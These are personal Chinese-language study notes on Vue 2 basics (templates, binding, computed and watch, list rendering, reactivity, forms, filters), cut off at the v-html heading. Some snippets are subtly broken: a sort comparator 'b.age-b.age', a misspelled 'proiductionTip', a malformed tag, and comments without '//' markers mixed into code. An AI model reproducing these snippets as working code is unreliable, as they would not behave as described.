初识Vue
1.想让Vue工作,就必须创建一个Vue实例,且要传入一个配置对象;
2.root容器里的代码依然符合html规范,只不过混入了一些特殊的Vue语法;
3.root容器里的代码被称为【Vue模板】;
4.Vue实例和容器是一一对应的;
5.真实开发中只有一个Vue实例,并且会配合着组件一起使用;
6.{{xxx}}中的xxx要写js表达式,且xxx可以自动读取到data中的所有属性;
7.一旦data中的数据发生改变,那么页面中用到该数据的地方也会自动更新;
<div id="root">
<h1>5555,{{name.toUpperCase()}}</h1>
</div>
<script type="text/javascript">
Vue.config.productionTip = false; //阻止启动时生成生产模式
创建Vue实例
new Vue({
el:'#root', //el element简写 用于指定当前vue实例为当前哪个容器服务
//值通常为CSS选择器字符串
data:{ //data中用于存储数据,数据供el所指定的容器去使用
//值我们暂时写成一个对象
name :'zdd'
}
});
vue模板语法
<div id = 'root'>
<h1>插值语法</h1>
<h3>你好,{{name}}</h3>
Vue 模板语法
1.插值语法
功能 : 用于解析标签体内容
写法 : {{XXX}} XXX为js表达式 且可以直接读取到data中的所有属性
<h1>指令语法</h1>
<h3><a v-bind:href="url">点我去{{school.name}}</a></h3>
<h3><a :href="url">点我去百度2</a></h3>
使用v-bind时,后边引号内容会当做表达式来执行
v-bind 可简写为 :
2.指令语法
功能 : 用于解析标签(包括 : 标签属性 标签体内容 绑定事件...)
举例 : v-bind:href="xxx" 或者简写为 :href="xxx" xxx为js表达式
且可以读取到data中的属性
备注 : vue中有很多指令 且形式都为 v-xxxx 此处只是拿v-bind举个例子
</div>
<script type="text/javascript">
new Vue({·
el :'#root',
data :{
name : 'zdd',
school : {
name : '度11',
url : 'www.baidu.com'
}
}
})
</script>
数据绑定
<div id = 'root'>
单向数据绑定: <input type="text" v-bind:value = 'name'>
双向数据绑定: <input type="text" v-model:value = 'name'>
双向数据绑定: <input type="text" v-model = 'name'>
</div>
vue数据绑定有两种写法
1.单向数据绑定: v-bind 数据只能从data流向页面
2.双向数据绑定: v-model 数据不仅可以从data流向页面,还可以从页面流向data
备注 :
1.双向绑定一般都应用在表单类元素上(如 input select 等等)
2.v-model:value可以简写为 v-model 因为v-model默认收集的就是value值
<script type="text/javascript">
new Vue ({
el:'#root',
data :{
name : 'zdd'
}
})
</script>
el与data的两种写法
<div id = 'root'>
<h1>你好,{{name}}</h1>
</div>
<script type="text/javascript">
data与el的2种写法
1.el有2种写法
(1).new Vue时候配置el属性。
(2).先创建Vue实例,随后再通过vm.$mount('#root')指定el的值。
2.data有2种写法
(1).对象式
(2).函数式
如何选择:目前哪种写法都可以,以后学习到组件时,data必须使用函数式,否则会报错。
3.一个重要的原则:
由Vue管理的函数,一定不要写箭头函数,一旦写了箭头函数,this就不再是Vue实例了。
el的两种写法
第一种写法
new Vue({
el : '#root',
data : {
name : 'zdd'
}
})
第二种写法
const v = new Vue({
data : {
name : 'zdd'
}
})
v.$mount('#root')
data的两种写法
第一种写法 对象式
new Vue({
el :'#root',
data: { //对象式
name : 'dddd'
}
})
第二种写法 函数式
new Vue ({
el:'#root',
data(){ //函数式
return{
name :'dddd'
}
}
})
</script>
MVVM模型
M : 模型(Model) 对应data中的数据
V : 视图(View) 模板
VM : 视图模型(ViewModel) Vue实例
data中出现的所有的属性 最后都出现在了vm身上
vm身上的所有属性 以及vue原型上的所有属性
在vue模板中都可以直接使用
↓↓↓ View 视图 模板
<div id='root'>
<h1>你好,{{name}}</h1>
<h1>我是,{{address}}</h1>
</div>
<script type="text/javascript">
new Vue({
↓↓↓ ViewModel 视图模型 Vue实例
el : '#root',
data :{
↓↓↓ Model 模型 对应data中的数据
name : 'zdd',
address :'handan'
}
})
</script>
数据代理
回顾objec.defineproperty
<script type="text/javascript">
let number = 18
let person ={
name : 'zdd',
sex :'男',
}
Object.defineProperty(person,'age',{ //追加一个age属性
value : 18,
enumerable:true, //控制属性是否可以被枚举 默认值为false
writable : true, //控制属性是否可以被修改 默认值为false
configurable : true,//控制属性是否可以被删除 默认值为false
//当有人读取person的age属性时,get函数(getter)就会被调用且返回值就是age的值
get(){
return number
},
//当有人修改person的age属性时,set函数(setter)就会被调用,且会收到修改的具体值
set(value){
number = value
}
})
console.log(person);
数据代理: 通过一个对象代理对另一个对象中属性的操作(读/写)
<script type="text/javascript">
let aa = {x:100}
let bb = {y:100}
Object.defineProperty(bb,'x',{ //在bb中添加x属性
get(){
//当读取bb对象中 x 的值时 get函数会返回aa中x的值
return aa.x
},
//当修改bb对象中的 x 值时 set函数会把value值赋给aa对象中的x
//从而实现通过一个对象代理对另一个对象中属性的操作
set(value){
aa.x = value
}
})
</script>
1.vue中的数据代理:
通过vm对象来代理data对象中属性的操作
2.vue中数据代理的好处:
更加方便的操作data中的数据
3.基本原理
通过Object.defineproperty()把data对象中的所有属性添加到vm上
为每个添加到vm上的属性 都指定一个getter/setter
在getter/setter内部去操作(读/写)data中对应的属性
<div id = 'root'>
<h1>学校名称 :{{name}}</h1>
<h1>学校地址 :{{address}}</h1>
</div>
<script type="text/javascript">
const vm = new Vue({
el : '#root',
data :{
name :'zd',
address : 'ypw'
}
})
</script>
事件处理
事件的基本使用:
1.使用v-on:xxx 或者@xxx 绑定事件,xxx为事件名
2.事件的回调需要配置在methods对象中 最终会在vm上
3.methods中配置的函数 不要用箭头函数 否则this就不是vm了
methods中配置的函数 都是被Vue所管理的函数 this的指向是vm
或者是组件实例对象
4.@click = 'demo' 和 @click = 'demo($event)'
效果一致 但是后者可以传参数
<div id = 'root'>
<h1>你好,{{name}}</h1>
单击事件 showInfo为数据绑定
<button v-on:click='showInfo'>点我提示信息</button>
可以简写为 ↓↓↓↓
<button @click='showInfo'>点我提示信息</button>
</div>
<script type="text/javascript">
const vm = new Vue({
el:'#root',
data:{
name:'研二'
},
methods:{ //使用methods方法来对应showinfo
showInfo(){
alert('你好啊!')
// console.log(this); 此时的this为vm实例对象
}
}
})
</script>
Vue中的事件修饰符:修饰符可以连续写
1.prevent : 阻止默认事件(常用)
2.stop : 阻止事件冒泡 (常用)
3.once : 事件只触发一次 (常用)
4.capture : 使用事件的捕获模式
5.self : 只有event.target 是当前操作的元素时才触发事件
6.passive :事件的默认行为立即执行 无需等待事件回调执行完毕
<div id = 'root'>
<h2>你好,{{name}}</h2>
阻止事件的默认行为 @click.prevent
<a href="www.baidu.com" @click.prevent='showInfo'>点击</a>
阻止事件冒泡 @click.stop
<div class="demo1" @click='showInfo'>
<button @click.stop='showInfo'>点击</button>
</div>
事件只触发一次 @click.once
<button @click.once='showInfo'>点击</button>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el : "#root",
data:{
name : '研二'
},
methods:{
showInfo(e){
alert('你好啊 ')
}
}
})
</script>
1.Vue中常用的按键别名
回车 : enter
删除 : delete (捕获删除和退格键)
退出 : esc
空格 : space
换行 : tab (特殊 必须配合keydown使用)
上 : up
下 : down
左 : left
右 : right
2.Vue未提供别名的按键,可以使用按键原始的key值来绑定
但要注意转为 kebab—case(短横线命名) 例如 CapsLock
应该命名为caps-lock 两个不同的单词之间要用短横线连接
且两个单词开头要小写
3.系统修饰键 (用法特殊) :Ctrl alt shift meta(win键)
(1).配合keyup使用时, 按下修饰键的同时 再按下其他键
随后释放其他键 事件可以触发
(2).配合keydown使用时,正常使用触发事件
4.也可以使用keyCode去指定具体的按键 (不推荐)
例如 @keyup.enter可以改写为@keyup.13
5.Vue.config.keyCodes.自定义键名 = 键码
可以去定制按键别名
Vue.config.keyCodes.huiche= 13
将回车键 改为 'huiche'
<div id = 'root'>
<h2>你好,{{name}}</h2>
@keyup.enter 当按下回车时 触发事件
<input type="text" placeholder="按回车提示输入内容"
@keyup.enter=showInfo>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
new Vue({
el :'#root',
data : {
name : '研二'
},
methods:{
showInfo(e){
console.log(e.target.value);
}
}
})
</script>
计算属性
插值语法实现姓名案例
<div id = 'root'>
姓 :<input type="text" v-model="firstName"><br><br>
名 :<input type="text" v-model="lastName"><br><br>
姓名:<span>{{firstName}}-{{lastName}}</span>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
new Vue({
el : '#root',
data:{
firstName : '张',
lastName : '三'
}
})
</script>
methods实现姓名案例
<div id = 'root'>
姓 :<input type="text" v-model="firstName"><br><br>
名 :<input type="text" v-model="lastName"><br><br>
姓名:<span>{{fullName()}}</span>
</div>
只要data中的数据发生改变 vue会重新解析模板 从而更新数据
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el : '#root',
data:{
firstName : '张',
lastName : '三'
},
methods:{
fullName(){
return this.firstName +'-'+this.lastName
}
}
})
</script>
计算属性实现姓名案例
<div id = 'root'>
姓 :<input type="text" v-model="firstName"><br><br>
名 :<input type="text" v-model="lastName"><br><br>
姓名:<span>{{fullName}}</span>
</div>
计算属性 :
1.定义:要用的属性不存在 要通过已有的属性计算得来
2.原理:底层借助了Object.defineproperty方法提供的getter和setter
3.get函数什么时候调用
1.初次读取fullName时调用
2.所依赖的的数据发生变化时
4.优势 : 与methods方法相比 内部用缓存机制 (复用) 效率更高 调式方便
5.备注 :
1.计算属性最终会出现在vm上,直接读取使用即可
2.如果计算属性要被修改 必须写set函数去响应修改 且set中要引起计算时依赖数据发生改变
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el : '#root',
data:{
firstName : '张',
lastName : '三'
},
computed:{
fullName:{
// get 作用 当有人读取fullName时 get会被调用 且返回值就作为fullName的值
get(){
return this.firstName + '-' + this.lastName
},
set(value){ //set在fullName被修改时调用
const arr = value.split('-')
this.firstName = arr[0]
this.lastName = arr[1]
}
}
}
})
</script>
计算属性简写
<div id = 'root'>
姓 :<input type="text" v-model="firstName"><br><br>
名 :<input type="text" v-model="lastName"><br><br>
姓名:<span>{{fullName}}</span>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el : '#root',
data:{
firstName : '张',
lastName : '三'
},
computed:{
fullName:{
get(){
return this.firstName + '-' + this.lastName
}
}
}
可以简写为----------- 只考虑读取 不考虑修改时 可采用简写形式
computed:{
fullName(){
return this.firstName + '-' + this.lastName
}
}
})
</script>
监视属性
天气监视案例
<div id = 'root'>
<h2>今天天气{{info}}</h2>
绑定事件的时候 @xxx='可以写一些简单的语句'
<button @click='isHot = !isHot'>切换天气</button>
<button @click='changeWeather'>切换天气</button>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
new Vue({
el : '#root',
data: {
isHot: true
},
computed: {
info(){
return this.isHot ? '炎热' : '凉爽'
}
},
methods: {
changeWeather(){
this.isHot = !this.isHot
}
},
})
</script>
天气案例-监视属性
监视属性Watch:
1.当被监视的属性发生变化时,回调函数自动调用 进行相关操作
2.监视的属性必须存在 才能进行监视
3.监视的两种写法:
1.new Vue时传入Watch配置
2.通过vm.$watch监视
<div id = 'root'>
<h2>今天天气{{info}}</h2>
<button @click='changeWeather'>切换天气</button>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el : '#root',
data: {
isHot: true
},
computed: {
info(){
return this.isHot ? '炎热' : '凉爽'
}
},
methods: {
changeWeather(){
this.isHot = !this.isHot
}
},
watch:{
isHot:{
immediate:true,//初始化时 让handler调用一下
// handler 在isHot发生改变时调用
handler(newValue,oldValue){
console.log(newValue,oldValue);
}
}
}
})
vm.$watch('isHot',{
immediate:true,//初始化时 让handler调用一下
// handler 在isHot发生改变时调用
handler(newValue,oldValue){
console.log(newValue,oldValue);
}
})
</script>
天气案例-深度监视
深度监视:
1.Vue中watch默认不检测对象内部值的变化(一层)
2.配置deep:true可以检测对象内部值的变化 (多层)
备注:
1.Vue自身可以检测对象内部值的变化,但Vue提供的watch默认不可以
2.使用watch时,根据数据的具体结构,决定是否采用深度监视
<div id = 'root'>
<h2>今天天气{{info}}</h2>
<button @click='changeWeather'>切换天气</button>
<br>
<hr>
<h3>a的值:{{numbers.a}}</h3>
<button @click= "numbers.a++">点我让a加1</button>
<h3>b的值:{{numbers.b}}</h3>
<button @click= "numbers.b++">点我让b加1</button>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el : '#root',
data: {
isHot: true,
numbers:{
a:1,
b:2
}
},
computed: {
info(){
return this.isHot ? '炎热' : '凉爽'
}
},
methods: {
changeWeather(){
this.isHot = !this.isHot
}
},
watch:{
isHot:{
immediate:true,//初始化时 让handler调用一下
// handler 在isHot发生改变时调用
handler(newValue,oldValue){
console.log(newValue,oldValue);
}
},
// 监视多级结构中某个属性的变化
"numbers.a":{
deep:true,
handler(){
console.log('a改变了');
}
},
// 监视多级结构中所有属性的变化
numbers:{
deep:true,
handler(){
console.log('numbers改变了');
}
}
}
})
</script>
监视属性简写
<div id = 'root'>
<h2>今天天气{{info}}</h2>
<button @click='changeWeather'>切换天气</button>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el : '#root',
data: {
isHot: true,
},
computed: {
info(){
return this.isHot ? '炎热' : '凉爽'
}
},
methods: {
changeWeather(){
this.isHot = !this.isHot
}
},
watch:{
isHot:{
immediate:true,//初始化时 让handler调用一下
handler(newValue,oldValue){
console.log(newValue,oldValue);
}
},
简写
isHot(newValue,oldValue){
console.log(newValue,oldValue);
}
}
})
vm.$watch('isHot',{
immediate:true,//初始化时 让handler调用一下
// handler 在isHot发生改变时调用
handler(newValue,oldValue){
console.log(newValue,oldValue);
}
})
简写 不允许写成箭头函数 会造成this指向错误 会指向window
vm.$watch('isHot',function(newValue,oldValue){
console.log(newValue,oldValue);
})
</script>
姓名案例 watch实现
computed和watch的区别
1.computed能完成的功能,watch都能完成
2.watch能完成的功能 computed不一定能完成 例如 watch可以进行异步任务
重要小原则
1.所有被vue所管理的函数 最好写成普通函数 这样this的指向才是vm或者组件实例对象
2.所有不被vue所管理的函数 最好写成箭头函数 例如(定时器的回调函数
ajax的回调函数,promise的回调函数)这样this的指向才是vm 或 组件实例对象
<div id = 'root'>
姓 :<input type="text" v-model="firstName"><br><br>
名 :<input type="text" v-model="lastName"><br><br>
姓名:<span>{{fullName}}</span>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el : '#root',
data:{
firstName : '张',
lastName : '三',
fullName:"张-三"
},
watch: { // watch可以开启异步任务
firstName(val){
setTimeout(() => { //延迟一秒实现
this.fullName = val + '-'+ this.lastName
}, 1000);
},
lastName(val){
this.fullName = this.firstName +'-'+ val
}
},
})
</script>
绑定样式
1.class样式
写法:class='xxx' xxx可以是字符串,对象 数组
字符串写法适用于 类名不确定 要动态获取
对象写法适用于 要绑定多个样式 个数不确定 名字不确定
数组写法适用于 要绑定多个样式 个数确定 名字确定
2.style样式
:style='{fontSize:xxx}' 其中xxx是动态值
:style='[a,b]'其中a、b为样式对象
样式对象的key命名时应为存在的css属性
<div id = 'root'>
绑定class样式,字符串写法 适用于样式的类名不确定 需要动态决定
<div class="basic" :class="mood" @click="changeMood">{{name}}</div> <br><br>
绑定class样式 数组写法 适用于 要绑定的样式个数不确定 名字也不确定
<div class="basic" :class="classArr">{{name}}</div> <br><br>
绑定class样式 对象写法 适用于 要绑定的样式个数确定 名字确定 但要动态决定用不用
<div class="basic" :class="classObj">{{name}}</div> <br><br>
绑定style样式 对象写法
<div class="basic" :style="styleObj">{{name}}</div> <br><br>
绑定style样式 数组写法
<div class="basic" :style="styleArr">{{name}}</div> <br><br>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el:'#root',
data:{
name:"研二",
mood:'normal',
classArr:['atguigu1','atguigu2','atguigu3'],
classObj:{
atguigu1:false,
atguigu2:false
},
styleObj:{
fontSize :'40px',
color : 'pink',
backgroundColor:'blue'
},
styleArr:[{fontSize:'40px',color:'blue'},{backgroundColor:'pink'}
]
},
methods: {
changeMood(){
const arr = ['sad','happy','normal']
const index = Math.floor(Math.random()*3)
this.mood = arr[index]
}
},
})
</script>
条件渲染
1.v-if 写法
v-if= '表达式'
v-else-if= '表达式'
v-else= '表达式'
适用于 切换频率较低的场景
特点 不展示的DOM元素直接被移除
注意 v-if可以和v-else-if v-else一起使用 但结构不可以被打断
2.v-show 写法
v-show = "表达式"
适用于切换频率较高的场景
特点 不展示的DOM元素未被移除 仅仅是使用样式隐藏掉
3.备注 使用v-if是 元素可能无法获取到 而使用v-show一定可以获取到
<div id = 'root'>
使用v-show做条件渲染
<h2 v-show="true">你好,{{name}}</h2>
<h2 v-show="1===1">你好,{{name}}</h2>
使用v-if做条件渲染
h2 v-if="true">你好,{{name}}</h2>
<h2 v-if="1===1">你好,{{name}}</h2>
<h2>当前的n值是{{n}}</h2>
<button @click='n++'>点我+1</button>
<div v-show = 'n===1'>我是1</div>
<div v-show = 'n===2'>我是2</div>
<h2>当前的n值是{{n}}</h2>
<button @click='n++'>点我+1</button>
<div v-if = 'n===1'>我是1</div>
<div v-if = 'n===2'>我是2</div>
<h2>当前的n值是{{n}}</h2>
<button @click='n++'>点我+1</button>
<div v-if = 'n===1'>我是1</div>
中间不可以被打断
<div v-else-if = 'n===2'>我是2</div>
<h2>当前的n值是{{n}}</h2>
<button @click='n++'>点我+1</button>
<div v-if = 'n===1'>我是1</div>
中间不可以被打断
<div v-else = 'n===2'>我是{{n}}</div>
v-if 和 template的配合使用
<template v-if = 'n===1'>
<h2>你好</h2>
<h2>研二</h2>
</template>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
new Vue({
el:"#root",
data:{
name:'研二',
n:0
}
})
</script>
列表渲染
基本列表
遍历 v-for指令
1.用于展示列表数据
2.语法:v-for='(item,index)in xxx ' :key='yyy'
3.可遍历:数组 对象 字符串 指定次数
<div id = 'root'>
遍历数组
<h2>人员列表</h2>
<ul>
<!-- <li v-for="p in personslis" :key="p.id">{{p.name}}-{{p.age}}</li> -->
或者
<li v-for="(p,index) in personslis" :key="index">{{p.name}}-{{p.age}}</li>
</ul>
遍历对象
<h2>汽车信息</h2>
<ul>
<li v-for='(a,b) of car' :key='b'>
{{a}}-{{b}}
</li>
</ul>
遍历字符串
<h2>测试遍历字符串</h2>
<ul>
<li v-for='(a,b) of str' :key='b'>
{{a}}-{{b}}
</li>
</ul>
遍历指定次数
<h2>遍历指定次数</h2>
<ul>
<li v-for='(a,b) of 5' :key='b'>
{{a}}-{{b}}
</li>
</ul>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
new Vue({
el:'#root',
data:{
personslis:[
{id:'001',name:'研二',age:24},
{id:'002',name:'赵',age:22},
{id:'003',name:'d',age:21}
],
car:{
name : 'audi',
price : '70万',
color:'黑色'
},
str:'yaner'
}
})
</script>
key的原理
面试题react vue中的key有什么作用 (key的内部原理)
1.虚拟dom中key的作用:
key是虚拟dom对象的标识 当数据发生变化时vue会根据新数据生成新的虚拟dom
随后vue进行新虚拟dom与旧虚拟dom的差异比较 比较规则如下:
2.对比规则
(1).旧虚拟dom中找到了与新虚拟dom相同的key
若虚拟dom中的内容没变 直接使用之前的真实dom
若虚拟dom中的内容变了则生成新的真实dom 随后替换掉页面中之前的真实dom
(2).旧虚拟dom中未找到与新虚拟dom相同的key
创建新的真实dom 随后渲染到页面
3.用index作为key可能会引发的问题
(1).若对数据进行 逆序添加 逆序删除等破坏顺序操作
会产生没有必要的真实dom更新 页面效果没问题但是效率低
(2).如果结构中还包含输入类dom
会产生错误dom更新 界面有问题
4.开发中如何选择key
(1).最好使用每条数据的唯一标识作为key 比如id手机号身份证号学号等唯一值
(2).如果不存在数据的逆序添加 逆序删除 等破坏顺序操作
仅用于渲染列表用于展示 则使用index作为key是没有问题的
<div id = 'root'>
<h2>人员列表</h2>
<button @click="info">添加一个全</button>
<ul>
<li v-for="(p,index) in personslis"
:key="p.id">{{p.name}}-{{p.age}}
<input type="text">
</li>
</ul>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
new Vue({
el:'#root',
data:{
personslis:[
{id:'001',name:'研二',age:24},
{id:'002',name:'赵赵',age:22},
{id:'003',name:'dd',age:21}
],
},
methods: {
info(){
const a ={id:'004',name :"全",age :'18'}
this.personslis.unshift(a)
}
},
})
</script>
列表过滤
<div id = 'root'>
<h2>人员列表</h2>
<input type="text" placeholder="请输入名字" v-model= 'keyWord'>
<ul>
<li v-for="(p,index) in filpersonslis"
:key="p.id">{{p.name}}-{{p.age}}-{{p.sex}}
</li>
</ul>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
用watch实现
#region
new Vue({
el:'#root',
data:{
keyWord:'',
personslis:[
{id:'001',name:'马冬梅',age:24 ,sex :'女'},
{id:'002',name:'周冬雨',age:22 ,sex :'女'},
{id:'003',name:'周杰伦',age:21 ,sex :'男'},
{id:'004',name:'温兆伦',age:20 ,sex :'男'}
],
filpersonslis:[]
},
watch:{
keyWord:{
immediate : true,
handler(val){
this.filpersonslis = this.personslis.filter
((p)=>{return p.name.indexOf(val) !== -1 })
}
}
}
})
#endregion
用computed实现
new Vue({
el:'#root',
data:{
keyWord:'',
personslis:[
{id:'001',name:'马冬梅',age:24 ,sex :'女'},
{id:'002',name:'周冬雨',age:22 ,sex :'女'},
{id:'003',name:'周杰伦',age:21 ,sex :'男'},
{id:'004',name:'温兆伦',age:20 ,sex :'男'}
],
},
computed:{
filpersonslis(){
return this.personslis.filter((p)=>{
return p.name.indexOf(this.keyWord) !== -1
})
}
}
})
</script>
列表排序
<div id = 'root'>
遍历数组
<h2>人员列表</h2>
<input type="text" placeholder="请输入名字" v-model= 'keyWord'>
<button @click = 'sortType = 2'>年龄升序</button>
<button @click = 'sortType = 1'>年龄降序</button>
<button @click = 'sortType = 0'>原顺序</button>
<ul>
<li v-for="(p,index) in filpersonslis" :key="p.id">
{{p.name}}-{{p.age}}-{{p.sex}}</li>
</ul>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
// 用computed实现
new Vue({
el:'#root',
data:{
keyWord:'',
sortType:0, //0原顺序 1降序 2升序
personslis:[
{id:'001',name:'马冬梅',age:24 ,sex :'女'},
{id:'002',name:'周冬雨',age:22 ,sex :'女'},
{id:'003',name:'周杰伦',age:21 ,sex :'男'},
{id:'004',name:'温兆伦',age:20 ,sex :'男'}
],
},
computed:{
filpersonslis(){
const arr = this.personslis.filter((p)=>{
return p.name.indexOf(this.keyWord) !== -1
})
判断一下是否需要排序
if(this.sortType){
arr.sort((a,b)=>{
return this.sortType === 1 ? b.age-b.age : a.age-b.age
})
}
return arr
}
}
})
sort方法
let arr = [1,5,3,4,6]
arr.sort((a,b)=>{
return a-b 升序
return b-a 降序
})
console.log(arr);
</script>
模拟一个数据检测
<script type="text/javascript" >
let data = {
name:'尚',
address:'北京',
}
创建一个监视的实例对象,用于监视data中属性的变化
const obs = new Observer(data)
console.log(obs)
准备一个vm实例对象
let vm = {}
vm._data = data = obs
function Observer(obj){
汇总对象中所有的属性形成一个数组
const keys = Object.keys(obj)
遍历
keys.forEach((k)=>{
Object.defineProperty(this,k,{
get(){
return obj[k]
},
set(val){
console.log(`${k}被改了,我要去解析模板,生成虚拟DOM`)
obj[k] = val
}
})
})
}
</script>
监视数据原理总结
1.vue会监视data中所有层次的数据
2.如何检测对象中的数据
1.通过setter实现监控 且要在new vue时就传入要检测的数据
2.对象中后追加的属性 vue默认不做响应式处理
3.如需给后添加的属性做响应式 请使用如下api
Vue.set(target,propertyName/index,value)
vm.$set(target,propertyName/index,value)
3.如何检测数组中的数据
通过包裹数组更新元素的方法实现,本质就是做了两件事
1.调用原生对应的方法对数组进行更新
2.重新解析模板,进而更新页面
4.在Vue修改数组中的某个元素一定要用如下方法
1.使用这些API
push(可向数组的末尾添加一个或多个元素,并返回新的长度)
pop(移除一个元素,默认最后一个元素)
shift(移除数组的第一项)
unshift(可向数组的开头添加一个或更多元素,并返回新的长度)
splice(添加或删除数组中的元素)
sort(对原列表进行排序,如果指定参数,则使用比较函数指定的比较函数)
reverse(颠倒数组中元素的顺序)
特别注意 Vue.set() 和 vm.$set() 不能给vm或者vm的根数据对象(_data)添加属性
<div id = 'root'>
<h1>学生信息</h1>
<button @click='student.age++'>年龄+1</button><br>
<button @click='addSex'>添加性别属性</button><br>
<button @click='student.sex="未知" '>添加性别属性</button><br>
<button @click='addFriend'>列表首位添加一个朋友</button><br>
<button @click='updatafirstfriendName'>修改第一名字为:张</button><br>
<button @click='addHobby'>添加一个爱好</button><br>
<button @click='removeWeibo'>移除微博爱好</button><br>
<button @click='updateHobby'>修改第一个爱好为:开车</button><br>
<h3>姓名:{{student.name}}</h3>
<h3>年龄:{{student.age}}</h3>
<h3 v-if='student.sex'>性别:{{student.sex}}</h3>
<h3>爱好:</h3>
<ul>
<li v-for="(h,index) in student.hobby" :key="index">
{{h}}
</li>
</ul>
<h3>朋友们:</h3>
<ul>
<li v-for="(f,index) in student.friends" :key="index">
{{f.name}}--{{f.age}}
</li>
</ul>
</div>
<script type="text/javascript">
Vue.config.proiductionTip = false
const vm = new Vue({
el:'#root',
data:{
student:{
name:'研二',
age:24,
hobby:['听歌','打羽毛球','刷微博'],
friends:[
{name:'jerry',age:35},
{name:'tony',age:36}
]
}
},
methods: {
addSex(){
Vue.set(this.student,'sex','女')
vm.$set(this.student,'sex','女')
},
addFriend(){
vm.student.friends.unshift({name:'赵',age:21})
},
updatafirstfriendName(){
vm.student.friends[0].name = "dd"
},
addHobby(){
vm.student.hobby.push('学习')
},
updateHobby(){
vm.student.hobby.splice(0,1,'开车')
Vue.set(vm.student.hobby,0,'开车')
this.$set(vm.student.hobby,0,'开车')
},
removeWeibo(){
this.student.hobby = this.student.hobby.filter((h)=>{
return h!= '刷微博'
})
}
},
})
</script>
收集表单数据
收集表单数据:
若:<input type="text"/>,则v-model收集的是value值,用户输入的就是value值。
若:<input type="radio"/>,则v-model收集的是value值,且要给标签配置value值。
若:<input type="checkbox"/>
1.没有配置input的value属性,那么收集的就是checked(勾选 or 未勾选,是布尔值)
2.配置input的value属性:
(1)v-model的初始值是非数组,那么收集的就是checked(勾选 or 未勾选,是布尔值)
(2)v-model的初始值是数组,那么收集的的就是value组成的数组
备注:v-model的三个修饰符:
lazy:失去焦点再收集数据
number:输入字符串转为有效的数字
trim:输入首尾空格过滤
准备好一个容器
<div id="root">
<form @submit.prevent="demo">
账号:<input type="text" v-model.trim="userInfo.account"> <br/><br/>
密码:<input type="password" v-model="userInfo.password"> <br/><br/>
年龄:<input type="number" v-model.number="userInfo.age"> <br/><br/>
性别:
男<input type="radio" name="sex" v-model="userInfo.sex" value="male">
女<input type="radio" name="sex" v-model="userInfo.sex" value="female">
<br/><br/>
爱好:
学习<input type="checkbox" v-model="userInfo.hobby" value="study">
打游戏<input type="checkbox" v-model="userInfo.hobby" value="game">
吃饭<input type="checkbox" v-model="userInfo.hobby" value="eat">
<br/><br/>
所属校区
<select v-model="userInfo.city">
<option value="">请选择校区</option>
<option value="beijing">北京</option>
<option value="shanghai">上海</option>
<option value="shenzhen">深圳</option>
<option value="wuhan">武汉</option>
</select>
<br/><br/>
其他信息:
<textarea v-model.lazy="userInfo.other"></textarea> <br/><br/>
<input type="checkbox" v-model="userInfo.agree">阅读并接受
<a href="http://www.atguigu.com">《用户协议》</a>
<button>提交</button>
</form>
</div>
<script type="text/javascript">
Vue.config.productionTip = false
new Vue({
el:'#root',
data:{
userInfo:{
account:'',
password:'',
age:18,
sex:'female',
hobby:[],
city:'beijing',
other:'',
agree:''
}
},
methods: {
demo(){
console.log(JSON.stringify(this.userInfo))
}
}
})
</script>
过滤器
过滤器:
定义:对要显示的数据进行特定格式化后再显示(适用于一些简单逻辑的处理)。
语法:
1.注册过滤器:Vue.filter(name,callback) 或 new Vue{filters:{}}
2.使用过滤器:{{ xxx | 过滤器名}} 或 v-bind:属性 = "xxx | 过滤器名"
备注:
1.过滤器也可以接收额外参数、多个过滤器也可以串联
2.并没有改变原本的数据, 是产生新的对应的数据
准备好一个容器
<div id="root">
<h2>显示格式化后的时间</h2>
计算属性实现
<h3>现在是:{{fmtTime}}</h3>
methods实现
<h3>现在是:{{getFmtTime()}}</h3>
过滤器实现
<h3>现在是:{{time | timeFormater}}</h3>
过滤器实现(传参)
<h3>现在是:{{time | timeFormater('YYYY_MM_DD') | mySlice}}</h3>
<h3 :x="msg | mySlice">尚</h3>
</div>
<div id="root2">
<h2>{{msg | mySlice}}</h2>
</div>
<script type="text/javascript">
Vue.config.productionTip = false
全局过滤器
Vue.filter('mySlice',function(value){
return value.slice(0,4)
})
new Vue({
el:'#root',
data:{
time:1621561377603, //时间戳
msg:'你好,尚'
},
computed: {
fmtTime(){
return dayjs(this.time).format('YYYY年MM月DD日 HH:mm:ss')
}
},
methods: {
getFmtTime(){
return dayjs(this.time).format('YYYY年MM月DD日 HH:mm:ss')
}
},
局部过滤器
filters:{
timeFormater(value,str='YYYY年MM月DD日 HH:mm:ss'){
console.log('@',value)
return dayjs(value).format(str)
}
}
})
new Vue({
el:'#root2',
data:{
msg:'hello,atguigu!'
}
})
</script>
内置指令
我们学过的指令:
v-bind : 单向绑定解析表达式, 可简写为 :xxx
v-model : 双向数据绑定
v-for : 遍历数组/对象/字符串
v-on : 绑定事件监听, 可简写为@
v-if : 条件渲染(动态控制节点是否存存在)
v-else : 条件渲染(动态控制节点是否存存在)
v-show : 条件渲染 (动态控制节点是否展示)
v-text指令:
1.作用:向其所在的节点中渲染文本内容。
2.与插值语法的区别:v-text会替换掉节点中的内容,{{xx}}则不会。
准备好一个容器
<div id="root">
<div>你好,{{name}}</div>
<div v-text="name"></div>
<div v-text="str"></div>
</div>
</body>
<script type="text/javascript">
Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
new Vue({
el:'#root',
data:{
name:'尚',
str:'<h3>你好啊!</h3>'
}
})
</script>
v-html指令:
